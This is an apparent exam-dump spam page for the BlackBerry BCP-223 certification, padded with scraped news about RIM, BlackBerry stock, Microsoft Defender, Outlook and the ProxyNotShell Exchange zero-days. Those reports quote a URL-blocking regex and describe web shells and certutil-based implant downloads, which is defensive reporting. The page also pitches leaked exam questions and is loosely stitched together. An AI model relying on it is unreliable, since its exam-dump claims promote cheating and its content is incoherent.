Download free BCP-223 free pdf with free pdf and Exam Questions BCP-223 cram contains a Complete Pool of BCP-223 Questions and Answers and Practice Test checked and substantial including references and clarifications (where material). Our objective to rehearse the BCP-223 Questions and Answers is not just to breeze through the Supporting BlackBerry Enterprise Server/Microsoft Exchange v5 test at first endeavor yet Really Improve Your Knowledge about the BCP-223 test subjects.

Exam Code: BCP-223 Practice test 2022 by team
Supporting BlackBerry Enterprise Server/Microsoft Exchange v5
BlackBerry Server/Microsoft PDF Download
Killexams : BlackBerry Server/Microsoft PDF download - BingNews Search results Killexams : BlackBerry Server/Microsoft PDF download - BingNews Killexams : RIM Introduces BlackBerry Enterprise Server Express

Waterloo, ON - Research In Motion (RIM) (NASDAQ: RIMM; TSX: RIM) today introduced BlackBerry® Enterprise Server Express - free new server software that wirelessly and securely synchronizes BlackBerry® smartphones with Microsoft® Exchange or Microsoft® Windows® Small Business Server.

The new BlackBerry Enterprise Server Express software will be provided free of charge in order to address two key market opportunities. First, the software offers economical advantages to small and mid-sized businesses (SMBs) that desire the enterprise-grade security and manageability of BlackBerry® Enterprise Server but don’t require all of its advanced features. Second, more and more consumers are purchasing BlackBerry smartphones and the free BlackBerry Enterprise Server Express software provides a cost-effective solution that enables IT departments to meet the growing demand from employees to be able to connect their personal BlackBerry smartphones to their work email.

BlackBerry Enterprise Server Express works with Microsoft Exchange 2010, 2007 and 2003 and Microsoft Windows Small Business Server 2008 and 2003 to provide users with secure, push-based, wireless access to email, calendar, contacts, notes and tasks, as well as other business applications and enterprise systems behind the firewall. Importantly, the new server software utilizes the same robust security architecture found in BlackBerry Enterprise Server.

"Today we are announcing an exciting new offering that further expands the market opportunity for the BlackBerry platform," said Mike Lazaridis, President and Co-CEO, Research In Motion. “In a marketplace where smartphones are becoming ubiquitous, BlackBerry Enterprise Server Express significantly raises the bar by providing a cost-effective solution that allows companies of all sizes to support enterprise-grade mobile connectivity for all employees without compromising security or manageability.”

With BlackBerry Enterprise Server Express connected to Microsoft Exchange or Microsoft Windows Small Business Server, BlackBerry smartphone users will be able to:

  • Wirelessly synchronize their email, calendar, contacts, notes and tasks
  • Manage email folders and search email on the mail server remotely
  • Book meetings and appointments, check availability and forward calendar attachments
  • Set an out-of-office reply
  • Edit Microsoft Word, Excel and PowerPoint files using Documents To Go®
  • Access files stored on the company network
  • Use mobile applications to access business systems behind the firewall

For IT administrators, BlackBerry Enterprise Server Express also offers the following:

  • Runs on the same physical or virtual server as the Microsoft mail server or on its own server. BlackBerry Enterprise Server Express is also certified for use with VMware ESX
  • Over 35 IT controls and policies, including the ability to remotely wipe a smartphone and enforce and reset passwords
  • A Web-based interface that allows remote administration and makes it easy to install the software, connect BlackBerry smartphones and apply usage policies

BlackBerry® Enterprise Server v5 continues to be the recommended solution for deployments that require additional security policies, monitoring features or high availability. BlackBerry Enterprise Server also continues to be required for certain other enterprise solutions such as BlackBerry® Mobile Voice System (for bringing desk phone functionality to BlackBerry smartphones), BlackBerry® Clients for Microsoft® Office Communications Server and IBM® Lotus® Sametime® (for enterprise instant messaging), IBM Lotus Connections (for enterprise social networking), IBM Lotus Quickr™ (for document sharing and collaboration), and Chalk® Pushcast Software (for corporate podcasting).

BlackBerry Enterprise Server Express is expected to be available as a free download in March. For more information, visit

About Research In Motion (RIM)                      
Research In Motion is a leading designer, manufacturer and marketer of innovative wireless solutions for the worldwide mobile communications market. Through the development of integrated hardware, software and services that support multiple wireless network standards, RIM provides platforms and solutions for seamless access to time-sensitive information including email, phone, SMS messaging, Internet and intranet-based applications. RIM technology also enables a broad array of third party developers and manufacturers to enhance their products and services with wireless connectivity. RIM’s portfolio of award-winning products, services and embedded technologies are used by thousands of organizations around the world and include the BlackBerry wireless platform, the RIM Wireless Handheld™ product line, software development tools, radio-modems and software/hardware licensing agreements. Founded in 1984 and based in Waterloo, Ontario, RIM operates offices in North America, Europe and Asia Pacific. RIM is listed on the NASDAQ Stock Market (NASDAQ: RIMM) and the Toronto Stock Exchange (TSX: RIM). For more information, visit or

Forward-looking statements in this news release are made pursuant to the "safe harbor" provisions of the United States Private Securities Litigation Reform Act of 1995. When used herein, words such as "intend" and similar expressions are intended to identify forward-looking statements. Forward-looking statements are based on assumptions made by and information available to Research In Motion Limited. Investors are cautioned that such forward-looking statements involve risks and uncertainties. Important factors that could cause actual results to differ materially from those expressed or implied by such forward-looking statements include, without limitation, possible product defects and product liability, risks related to international sales and potential foreign currency exchange fluctuations, the initiation or outcome of litigation, acts or potential acts of terrorism, international conflicts, significant fluctuations of quarterly operating results, changes in Canadian and foreign laws and regulations, continued acceptance of RIM's products, increased levels of competition, technological changes and the successful development of new products, dependence on third-party networks to provide services, dependence on intellectual property rights, and other risks and factors detailed from time to time in RIM's periodic reports filed with the United States Securities and Exchange Commission, and other regulatory authorities. RIM has no intention or obligation to update or revise any forward-looking statements, whether as a result of new information, future events or otherwise.

The BlackBerry and RIM families of related marks, images and symbols are the exclusive properties and trademarks of Research In Motion Limited. RIM, Research In Motion and BlackBerry are registered with the U.S. Patent and Trademark Office and may be pending or registered in other countries. All other brands, product names, company names, trademarks and service marks are the properties of their respective owners. RIM assumes no obligations or liability and makes no representation, warranty, endorsement or ensure in relation to any aspect of any third party products or services.

Fri, 24 Nov 2017 05:20:00 -0600 text/html
Killexams : Rumor: Microsoft still considering BlackBerry for possible acqusition

Is Microsoft still in a buying mood after announcing a deal Monday to acquire Nokia's smartphone business? That's the possibility that has been brought up in a new Bloomberg article, which claims that Microsoft could be interested in buying troubled mobile phone maker BlackBerry.

The article claims, via unnamed sources, that Microsoft "is keeping an eye" on BlackBerry for a possible deal. The Canadian company announced a few weeks ago it was looking at "strategic alternatives," which may include selling all or part of its business. Bloomberg's sources claim that there is still a large enterprise market for BlackBerry devices that could draw Microsoft's interest as it seeks to expand its smartphone business.

BlackBerry tried its best to relaunch itself in 2013, even going so far as to change its name from its previous title, Research in Motion. However, the launch of BlackBerry's new phones like the Z10, using its BlackBerry 10 OS, have been a sales failure, which helped Microsoft's Windows Phone, lead by Nokia's Lumia devices, to overtake BlackBerry as the third most popular smartphone OS worldwide.

If a Microsoft-BlackBerry deal is made, it's possible it could be similar to Nokia's arrangement in that Microsoft buys out the hardware business from BlackBerry, while allowing the company to keep its BBM messaging service. Such a deal still likely remains extremely unlikely, however, though it's no surprise Microsoft would monitor BlackBerry's status.

Source: Bloomberg

Fri, 23 Sep 2022 07:48:00 -0500 John Callaham en text/html
Killexams : How to download Microsoft Defender for Windows 11/10

Microsoft’s in-house security app, the Microsoft Defender is available for download on Windows 11/10 computers. They first got things underway by releasing a preview version of this app, which was available for download on Windows and Android devices, and users can now get the full version of the app from the Microsoft Store. Today, we will look at how you can download the Windows Defender app on a Windows 11 or 10 PC.

How to download Microsoft Defender for Windows 11

Microsoft has Windows Defender app integrated with Windows Security on Windows 11 and Windows 10. But the company has now released Microsoft Defender as a separate, standalone app, not just on Windows, but also macOS and Android.

The process of downloading Microsoft Defender on Windows is the same as it is for downloading a third-party app. Here are the steps that you need to follow:

  1. Open up the search panel from the Taskbar
  2. Type “Store” and subsequently open the Windows Store
  3. Search for Microsoft Defender in the search bar present on its homepage. In doing so, you’ll be linked to the Microsoft Defender download page
  4. Now click on the “Get” button and wait till the download and installation are finished

Once it has been installed, you can open it from the Windows Store and log in with your Microsoft credentials. Users should note that Microsoft Defender necessitates having a Microsoft 365 Family or Microsoft 365 Personal subscription. You can find a ticker among the app details, to check whether your PC is compatible with this app, as well as some other additional information, like the fact that you can use Microsoft Defender on as many as 10 Windows devices at a time.

Microsoft Defender for Windows 11/10/Server can be downloaded here from the Microsoft Store. I repeat, Microsoft Defender requires a Microsoft 365 Family or Microsoft 365 Personal subscription.

NOTE: IF Windows Security in Windows 11 not opening or working, you should not download this one. You can reset Windows Security or reinstall Windows Defender via Settings.

We hope that this post made it easy for you to understand how you can download Microsoft Defender.

ReadHow to enable or disable Windows Defender Firewall

Is Microsoft Windows Defender free?

If you don’t have an antivirus tool on your PC and are wondering if Microsoft Defender is a free, feasible option for you, then yes. The Microsoft Defender app is free to download from the Windows Store, although you are required to have a Microsoft 365 pack for it, the plans are priced variedly.

Do I need an antivirus if I have Windows Defender?

Another doubt that most Windows’ Microsoft Defender users had was if they needed antivirus software to work alongside Microsoft’s built-in PC protector. Since Microsoft Defender lacks endpoint protection and response and only goes through your emails, browser history, and cache data to look for cyber threats, which are also limited in number, it is advised that you run an antivirus software while still using Microsoft Defender.

Wed, 24 Aug 2022 00:29:00 -0500 en-us text/html
Killexams : How to make Outlook download all emails from server

Unwanted emails can take up a large space of your computer memory. To avoid this, Microsoft offers a parameter in Microsoft Outlook that determines how much mails should be available for download on your local PC. So, if your mail account is linked to Microsoft Exchange Server like Office 365 or Hotmail then, the configured parameter will automatically set the mails limit for your computer. If required, you can change this setting and make Outlook download all emails from the server.

If you’re using a mail provider service other than the one provided by Microsoft Exchange Server, like Google then, Outlook will simply ignore the parameter and download all mails.

To download all emails from Exchange Server in Outlook-

  1. Connect to Microsoft Exchange via Link
  2. Change Exchange Account Settings.

1] Connect to Microsoft Exchange via Link

Outlook download all emails

The simplest way to download all your emails from Exchange server is to scroll down to the bottom of a folder. If there are more items in that folder on the server, you’ll see a ‘Click here to view more on Microsoft Exchange’ link.

Hit the link and in seconds Outlook will begin to download all the emails to your computer.

2] Change Exchange Account Settings

For this, open Microsoft Outlook and go to the ‘File’ menu and choose ‘Account Settings’.

Next, select ‘Account Settings’ again from the drop-down menu.

Make Outlook download all emails

When directed to the ‘Account Settings’ window, select your account and hit the ‘Change’ button.

Thereafter, in the ‘Offline Settings’ window that opens up, check if ‘Use Cached Exchange Mode’ is enabled. If yes, slide the ‘Mail to keep offline’ slider to the desired time limit you want.

By default, options ranging from 3 days up to 5 years and All are available. Choose ‘All’ if you would like Outlook to download all of your mail to your computer. Before choosing ‘All’ option, make sure you have enough Disk space available on your computer.

When done, click ‘Next’ and restart Outlook, when prompted.

Once the process, is complete, you’ll notice a message at the bottom of Outlook saying ‘All folders are up to date’. This indicates that you have downloaded all your emails from Microsoft Exchange Server to your Outlook account.

Related: Leave a copy of messages on the server option missing in Outlook.

Hope you find this tip useful.

Outlook download all emails
Tue, 16 Aug 2022 20:41:00 -0500 en-us text/html
Killexams : Microsoft Updates Mitigation for Exchange Server Zero-Days

Microsoft today updated its mitigation measures for two recently disclosed and actively exploited zero-day vulnerabilities in its Exchange Server technology after researchers found its initial guidance could be easily bypassed.

Microsoft's original mitigation for the two vulnerabilities -- CVE-2022-41040 and CVE-2022-41082 — was to apply a blocking rule to a specific URL path using the URL Rewrite Module on IIS Server. According to the company, adding the string ".*autodiscover\.json.*\@.*Powershell.*" would help block known attack patterns against the vulnerabilities.

However, security researchers — including Vietnam-based security researcher Jang, Kevin Beaumont, and others — had noted that attackers can easily bypass Microsoft-recommended mitigation to exploit the vulnerabilities. "The '@' in the Microsoft-recommended ".*autodiscover\.json.*\@.*Powershell.*" URL block mitigations for CVE-2022-41040 [and] CVE-2022-41082 seems unnecessarily precise, and therefore insufficient," security researcher Will Dormann said in a tweet. "Probably try ".*autodiscover\.json.*Powershell.*" instead," he wrote.

The CERT Coordination Center at Carnegie Mellon University appeared to echo the recommendation in its note about the vulnerabilities. "The recommended block pattern is ".*autodiscover\.json.*Powershell.* (excluding the @ symbol) as a regular expression to prevent known variants of the #ProxyNotShell attacks," CERT said.

Updated Guidance 

On Tuesday, after more than a day of silence on the issue, Microsoft updated its guidance to reflect the change that the security researchers had suggested (.*autodiscover\.json.*Powershell.*). "Important updates have been made to the Mitigations section improving the URL Rewrite rule," Microsoft said. "Customers should review the Mitigations section and apply one of these updated mitigation options."

The blocking rule has been updated and enabled automatically for organizations that have enabled Microsoft's Exchange Emergency Mitigation Service. Microsoft has also updated a script that organizations could use to enable the URL Rewrite mitigation measure, and updated its step-by-step guidance on how to apply the rule for organizations that want to implement the mitigation manually. Microsoft has also strongly recommended that Exchange Server customer disable remote PowerShell access for nonadministrative users.

Microsoft originally released mitigation guidance on Sept. 30, following the public disclosure of CVE-2022-41040 and CVE-2022-41082, two vulnerabilities in Exchange Server that it said were being used in a limited number of targeted attacks since August 2022. The flaws affect on-premises versions of Microsoft Exchange Server 2013, 2016, and 2019 that are exposed to the Internet. The US Cybersecurity and Infrastructure Agency (CISA) has described the vulnerabilities as giving attackers a way to take control of an affected system

A map of devices from the Shodan search engine that security researcher Beaumont generated this week shows tens of thousands of systems around the world that appear to be running vulnerable versions of Exchange Server. 

Microsoft said customers of Microsoft Exchange Online are protected and therefore don't need to take any action — an assertion that Beaumont has challenged. "Even if you're Exchange Online, if you migrated and kept a hybrid server (a requirement until very recently) you are impacted," Beaumont noted. Beaumont has labeled the vulnerabilities as "ProxyNotShell" because the exploit process and Microsoft's mitigations are very similar to that associated with last year's ProxyShell vulnerabilities in Exchange Server.

Microsoft is currently working on a fix for the two vulnerabilities.

Common Issue

"It is common for fixes to not be complete," says David Lindner, CISO at Contrast Security. "We have not Tested the bypasses, but it is common for a back and forth to happen between exploit and fix until the true root cause is resolved." He points to the initial fixes for the Log4Shell vulnerability in Apache's Log4j logging frame as one example. "Over the course of a couple of weeks, there were multiple renditions trying to resolve the root of the issue," he notes.

CVE-2022-41040 is a server-side request forgery (SSRF) flaw that enables attackers to elevate privileges on a compromised system, and CVE-2022-41082 is a remote code execution flaw when PowerShell is remotely accessible to the attacker. Microsoft said it had detected a single threat actor using CVE-2022-41040 to remotely trigger CVE-2022-41082 and install a Web shell called Chopper on vulnerable systems that enabled them to steal data and conduct Active Directory reconnaissance. Chopper is a Web shell that has been previously associated with Chinese threat actors.

The flaws can be chained together in an attack — as happened with the threat actor that Microsoft observed — or used separately. In both instances, however, an attacker would need to be authenticated, even if it is only at the level of a standard user, to exploit the vulnerabilities, Microsoft said. Singapore-based security firm GTSC, discovered the two flaws and, in coordination with Trend Micro's Zero Day Initiative, reported the bugs to Microsoft.

Tue, 04 Oct 2022 10:51:00 -0500 en text/html
Killexams : Why Blackberry Stock (TSX:BB) Fell 16.5% in September Technology, internet and networking, security concept © Provided by The Motley Fool Technology, internet and networking, security concept

Let’s face it, September was a rough month. With the TSX falling 4.6%, all stocks were fighting a losing tape. Blackberry Ltd. (TSX:BB)(NYSE:BB) stock was no different. In fact, as usual, it was more volatile than most. At the end of the day, Blackberry stock fell 16.5% in September as the markets fell victim to an increasingly unfavourable macroeconomic environment.

Rising rates are not good for anyone, especially the higher risk companies with a lot of potential but no earnings – like Blackberry.

Blackberry stock (BB) reels as investors grow impatient waiting for growth

At the end of September, Blackberry reported its second quarter, fiscal 2023 results. They were not what we would have hoped for. In fact, its net loss of $0.05 per share reminded us that Blackberry still has a long way to go to become what we think it can become.  But the CEO did offer glimmers of hope on the conference call.

For example, billings in Blackberry’s cybersecurity business were promising. The market is dominated by Microsoft, but feedback from customers is encouraging. Apparently, Blackberry’s level of security protection is unmatched, even by the likes of Microsoft.

Moving on to Blackberry’s embedded systems (Internet of Things) segment. This is where the massive potential is. This segment currently accounts for 30% of Blackberry’s total revenue – and it’s where the real growth is expected. In the quarter, revenue increased 28% as demand was strong.

The bottom line here is that the headline numbers are still dismal for Blackberry. Its latest quarter is further evidence of this. This is what has dragged down Blackberry’s stock price once again in September.

Blackberry stock price BB stock © Provided by The Motley Fool Blackberry stock price BB stock

Yet, if we dig a little deeper, I think we will come out of this feeling much more bullish.

Analysts reduce their ratings and target prices on Blackberry stock

Visibility – it’s what we like to see in a company that we invest in. But sometimes, there’s little visibility. And sometimes, we can only have faith and conviction in our investment thesis. This is the case for Blackberry. Markets are uncertain and we have limited visibility into Blackberry’s future. This combination does not bode well for predictability and confidence.

So it’s not surprising that analysts have been reducing their target prices and ratings on Blackberry stock in September. For example, RBC lowered its target price for Blackberry to $6.00 from $6.50. Likewise, Canaccord Genuity lowered its target price to $5.00 from $6.00.

While these moves are understandable given the price action in the market today, it feels sort of backward-looking and reactionary to me. Because in reality, Blackberry is closer to success than it has ever been. For example, IVY, which is Blackberry’s partnership with Amazon Web Services, is seeing strong demand. The pilots are going well and Blackberry hopes that it will be in production by the end of the year. This software is changing cars as we know them, introducing different apps and safety features into our driving experience.

Factoring in ultra low expectations

Sentiment in the market in general deteriorated in September. Negative sentiment had already taken hold of Blackberry stock, and this just intensified the downward pressure. But the one thing that speaks volumes to me is the fact that Blackberry’s second quarter results, bad as they were, came in above expectations. This implies that the expectations built into Blackberry stock (valuation) are not high enough.

While there were plenty of reasons for Blackberry’s stock price (BB) to be down in September, there are also plenty of reasons to believe that things will turn around in October and beyond.

The post Why Blackberry Stock (TSX:BB) Fell 16.5% in September appeared first on The Motley Fool Canada.

Before you consider BlackBerry, you’ll want to hear this.

Our market-beating analyst team just revealed what they believe are the 5 best stocks for investors to buy in September 2022 … and BlackBerry wasn’t on the list.

The online investing service they’ve run for nearly a decade, Motley Fool Stock Advisor Canada, is beating the TSX by 21 percentage points. And right now, they think there are 5 stocks that are better buys.

See the 5 Stocks

* Returns as of 9/14/22

More reading

Fool contributor Karen Thomas owns shares of Blackberry Ltd. The Motley Fool has no position in any of the stocks mentioned. The Motley Fool has a disclosure policy.

Thu, 06 Oct 2022 03:30:00 -0500 en-CA text/html
Killexams : Microsoft: Two New 0-Day Flaws in Exchange Server

Microsoft Corp. is investigating reports that attackers are exploiting two previously unknown vulnerabilities in Exchange Server, a technology many organizations rely on to send and receive email. Microsoft says it is expediting work on software patches to plug the security holes. In the meantime, it is urging a subset of Exchange customers to enable a setting that could help mitigate ongoing attacks.

In customer guidance released Thursday, Microsoft said it is investigating two reported zero-day flaws affecting Microsoft Exchange Server 2013, 2016, and 2019. CVE-2022-41040, is a Server-Side Request Forgery (SSRF) vulnerability that can enable an authenticated attacker to remotely trigger the second zero-day vulnerability — CVE-2022-41082 — which allows remote code execution (RCE) when PowerShell is accessible to the attacker.

Microsoft said Exchange Online has detections and mitigation in place to protect customers. Customers using on-premises Microsoft Exchange servers are urged to review the mitigations suggested in the security advisory, which Microsoft says should block the known attack patterns.

Vietnamese security firm GTSC on Thursday published a writeup on the two Exchange zero-day flaws, saying it first observed the attacks in early August being used to drop “webshells.” These web-based backdoors offer attackers an easy-to-use, password-protected hacking tool that can be accessed over the Internet from any browser.

“We detected webshells, mostly obfuscated, being dropped to Exchange servers,” GTSC wrote. “Using the user-agent, we detected that the attacker uses Antsword, an active Chinese-based opensource cross-platform website administration tool that supports webshell management. We suspect that these come from a Chinese attack group because the webshell codepage is 936, which is a Microsoft character encoding for simplified Chinese.”

GTSC’s advisory includes details about post-compromise activity and related malware, as well as steps it took to help customers respond to active compromises of their Exchange Server environment. But the company said it would withhold more technical details of the vulnerabilities for now.

In March 2021, hundreds of thousands of organizations worldwide had their email stolen and multiple backdoor webshells installed, all thanks to four zero-day vulnerabilities in Exchange Server.

Granted, the zero-day flaws that powered that debacle were far more critical than the two detailed this week, and there are no signs yet that exploit code has been publicly released (that will likely change soon). But part of what made last year’s Exchange Server mass hack so pervasive was that vulnerable organizations had little or no advance notice on what to look for before their Exchange Server environments were completely owned by multiple attackers.

Microsoft is quick to point out that these zero-day flaws require an attacker to have a valid username and password for an Exchange user, but this may not be such a tall order for the hackers behind these latest exploits against Exchange Server.

Steven Adair is president of Volexity, the Virginia-based cybersecurity firm that was among the first to sound the alarm about the Exchange zero-days targeted in the 2021 mass hack. Adair said GTSC’s writeup includes an Internet address used by the attackers that Volexity has tied with high confidence to a China-based hacking group that has recently been observed phishing Exchange users for their credentials.

In February 2022, Volexity warned that this same Chinese hacking group was behind the mass exploitation of a zero-day vulnerability in the Zimbra Collaboration Suite, which is a competitor to Microsoft Exchange that many enterprises use to manage email and other forms of messaging.

If your organization runs Exchange Server, please consider reviewing the Microsoft mitigations and the GTSC post-mortem on their investigations.

Thu, 29 Sep 2022 11:59:00 -0500 en-US text/html
Killexams : Microsoft mitigation for new Exchange Server zero-day exploits can be bypassed

Attackers are currently exploiting two unpatched vulnerabilities to remotely compromise on-premises Microsoft Exchange servers. Microsoft confirmed the flaws late last week and published mitigation advice until a complete patch can be developed, but according to reports, the proposed mitigation can be easily bypassed.

The new vulnerabilities were discovered in early August by a Vietnamese security company called GTSC while performing security monitoring and incident response for a customer whose servers were attacked. Initially, the GTSC researchers thought they might be dealing with a ProxyShell exploit based on the malicious requests seen in the server logs which looked similar. ProxyShell is an attack that chains three Exchange vulnerabilities and was patched last year.

However, the incident response team quickly realized that the compromised Exchange servers where attackers had obtained remote code execution capabilities were fully up to date, which meant this couldn’t be ProxyShell. After reverse engineering confirmed they were dealing with previously unknown vulnerabilities, they submitted a report to Trend Micro’s Zero Day Initiative (ZDI) program whose analysts confirmed them and shared them with Microsoft.

The new attack exploits two vulnerabilities

The new attack chain exploits two new flaws that Microsoft now tracks as CVE-2022-41040 and CVE-2022-41082. The first one is a server-side request forgery (SSRF) issue that enables an authenticated attacker to trigger the second vulnerability. This in turn allows remote code execution via PowerShell. The flaws affect Microsoft Exchange Server 2013, Exchange Server 2016 and Exchange Server 2019, while Microsoft Exchange Online already has detections and mitigations in place. “It should be noted that authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability,” Microsoft said in its advisory.

In the attacks seen by GTSC across multiple customers, the attackers used the exploit to deploy web shells – backdoor scripts – masquerading as legitimate Exchange files such as RedirSuiteServiceProxy.aspx. They then proceeded to deploy credential dumping malware to steal credentials from the compromised servers. Based on the choice of web shells and other artifacts left behind, the researchers suspect the attackers are Chinese.

According to a separate report by Cisco Talos, the attackers used Antsword, a popular Chinese language-based open-source web shell; SharPyShell, an ASP.NET-based web shell; and China Chopper. They also abuse certutil, a legitimate utility, to download and deploy implants.

Copyright © 2022 IDG Communications, Inc.

Tue, 11 Oct 2022 06:53:00 -0500 en text/html
Killexams : Microsoft Confirms Two Zero Day Exploits of Exchange Server


Microsoft Confirms Two Zero Day Exploits of Exchange Server

Exchange Server products are potential subject two newly disclosed "zero-day" vulnerabilities that are under exploit, Microsoft acknowledged, in a Thursday announcement.

The two vulnerabilities are combined as part of remote code execution (RCE) attacks. Microsoft described these common vulnerabilities and exposures (CVEs) as follows:

  • CVE-2022-41040, a Server-Side Request Forgery vulnerability, and
  • CVE-2022-41082, which allows RCE "when PowerShell is accessible to the attacker."

The two vulnerabilities are present in "Microsoft Exchange Server 2013, 2016 and 2019." The attackers require having the credentials of a user to carry out the exploits.

Concerning the Exchange Server vulnerabilities, Microsoft is aware of "limited targeted attacks":

At this time, Microsoft is aware of limited targeted attacks using the two vulnerabilities to get into users' systems. In these attacks, CVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. It should be noted that authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either of the two vulnerabilities.

Exchange Online Not Vulnerable?
Microsoft claimed that "Exchange Online customers do not need to take any action," but many organizations using Exchange Online also may be using Exchange Server for administrative purposes, which once had been a requirement.

This notion that Exchange Online users also are vulnerable, too, was highlighted by security researcher Kevin Beaumont, formerly of Microsoft, who dubbed the two vulnerabilities as "ProxyNotShell," in his blog post:

Microsoft say "Microsoft Exchange Online Customers do not need to take any action." This is false -- if you run Exchange hybrid servers, a standard part of Microsoft Exchange Online migration, they are vulnerable. Thousands of orgs present these to the internet, too.

Microsoft had announced back in April that it was dropping the Exchange Server management requirement for Exchange Online users with Cumulative Update 12 for Windows Server 2019. However, Microsoft has also suggested that Exchange Online users "may not want to decommission Exchange Servers from on-premises," too, so it's a murky scenario.

Mitigation Steps for Now
Microsoft offered "mitigation" steps that Exchange Server user can implement to "block known attack patterns," as described in the Thursday announcement.

Mitigation advice also came from security solutions company GTSC, which first blew the whistle on the attacks by describing the zero-day Exchange Server flaws in this post. GTSC speculated that the exploits were being used by a "Chinese attack group."

Microsoft acknowledged that it fixed an early glitch in its mitigation advice, vs. GTSC's advice, in the comments section of this announcement. "MSRC blog post has now been edited to specify 'Regular Expressions' instead of 'Wildcards,'" wrote Nino Bilic of Microsoft. It seemed to be a goof on Microsoft's part.

Microsoft is working on a patch for the security issues, but offered its mitigation steps in the meantime "to help customers protect themselves from these attacks." Microsoft claimed that the mitigation has "no known impact to Exchange functionality if the URL Rewrite module is installed as recommended." It also recommended blocking two ports from using Remote PowerShell.

Microsoft's usual security tools appear to be just able to detect the post-exploitation malware used with these attacks.

Similar to ProxyShell
The exploits apparently follow a similar pattern to ProxyShell attacks of last year, but require authenticated access.

That circumstance led to initial confusion about whether GTSC was actually describing zero-day attacks, although Microsoft has essentially confirmed them as such. Early discussion on the ProxyShell attack similarities was highlighted by Beaumont, who offered this very informative Sept. 30 Twitter thread on the topic.

Beaumont also advised organizations to "stop representing OWA to the internet until there is a patch," presumably referring to the Outlook Web App. This advice isn't mentioned by Microsoft, but it was echoed by Jon Hencinski, vice president of security operations at security solutions company Expel.

After following Microsoft's mitigation advice, organizations should "review your Exchange configuration to determine if Outlook Web App (OWA) is exposed to the internet," Hencinski commented, via e-mail "If it's exposed, determine if it's necessary for any current business needs and evaluate the risk."

Hencinski added that "services like Shodan and Censys can help determine what services are publicly accessible."

Other security researchers, such as Claire Tills, senior research engineer at security solutions firm Tenable, affirmed that the Exchange Server vulnerabilities appear to be "variants of ProxyShell -- a chain of vulnerabilities disclosed in late 2021." Tills offered the following observation, via e-mail:

The key difference is that both these latest vulnerabilities, CVE-2022-41040 and CVE-2022-41082, require authentication where ProxyShell did not. Microsoft has confirmed the vulnerabilities but, at this time, we're still waiting on patches. Once those are available, organizations should deploy them with urgency. Microsoft and GTSC have both offered mitigation guidance for organizations to consider until patches have been released. ProxyShell was and remains one of the most exploited attack chains released in 2021.

Security solutions firm Huntress is posting updated information about the vulnerabilities in this post. "Currently, there are no known proof-of-concept scripts or exploitation tooling available in the wild," wrote John Hammond, senior security researcher at Huntress.

Microsoft hasn't issued patches yet. Organizations running Exchange Server will likely need to be using the latest cumulative updates, though, when those patches arrive.

"It's very likely when MS produces patches for this, they will be only for the latest supported Exchange CUs -- so you probably want to get to those first, otherwise the SU (Security Updates) won't show as applicable," Beaumont wrote in the Twitter thread.

About the Author

Kurt Mackie is senior news producer for 1105 Media's Converge360 group.

Tue, 04 Oct 2022 20:42:00 -0500 en-US text/html
Killexams : Microsoft: New Exchange Server zero-days already used in attacks, expect more to come
Image: Getty Images/iStockphoto

Microsoft has warned that attackers are already taking advantage of recently disclosed zero-day exploits to hack into victim's networks and steal data – and more attacks are likely to be on the way.

The two new zero-day vulnerabilities in Microsoft Exchange Server -- CVE-2022-41040 and CVE-2022-41082 -- were detailed last week, with warnings that they could allow hackers to remotely gain access to internal services and execute remote code on networks. 

Now Microsoft has provided more information on how the vulnerabilities have already been used – in attacks that first started in August. 

In what's described as a "small number of targeted attacks", the CVE-2022-41040 and CVE-2022-41082 vulnerabilities were chained together to provide attackers with "hands-on-keyboard access", which was used to perform Active Directory reconnaissance and to steal data. The victims haven't been publicly disclosed.

Also: The scary future of the internet: How the tech of tomorrow will pose even bigger cybersecurity threats

The attacks require the attacker to be an authenticated user, but it's possible to gain access to these credentials with phishing attacks, brute force attacks or buying stolen usernames and passwords from underground forums

While there's currently no specific indications as to who's behind these attacks, Microsoft's Security Threat Intelligence Team (MSTIC) "assesses with medium confidence" that they're the work of a single activity group connected to a state-sponsored cyber operation

Microsoft says it's working on what it describes as an "accelerated timeline" to release a security fix for the vulnerability – although it has yet to emerge. 

But since the vulnerability has been publicly disclosed, it's likely that hacking operations are already moving to take advantage of it before a patch becomes available, with Microsoft warning that "overall exploitation of these vulnerabilities will increase". 

Previous Microsoft Exchange vulnerabilities were featured in a variety of cyberattacks, including state-sponsored cyber-espionage campaigns, ransomware operations and cryptojacking attacks as attackers rushed to exploit the vulnerabilities before organisations had a chance to apply the patch. 

The United States Cybersecurity & Infrastructure Security Agency (CISA) has also issued a warning that attackers could exploit the latest Microsoft Exchange Server vulnerabilities. 

While a patch is yet to become available, Microsoft has provided guidance on mitigating the threat, including the recommendation that Exchange Server customers disable remote PowerShell access for non-admin users. 

"CISA encourages users and administrators to review the information from Microsoft and apply the necessary mitigations until patches are made available," said a CISA alert


Mon, 03 Oct 2022 02:04:00 -0500 en text/html
BCP-223 exam dump and training guide direct download
Training Exams List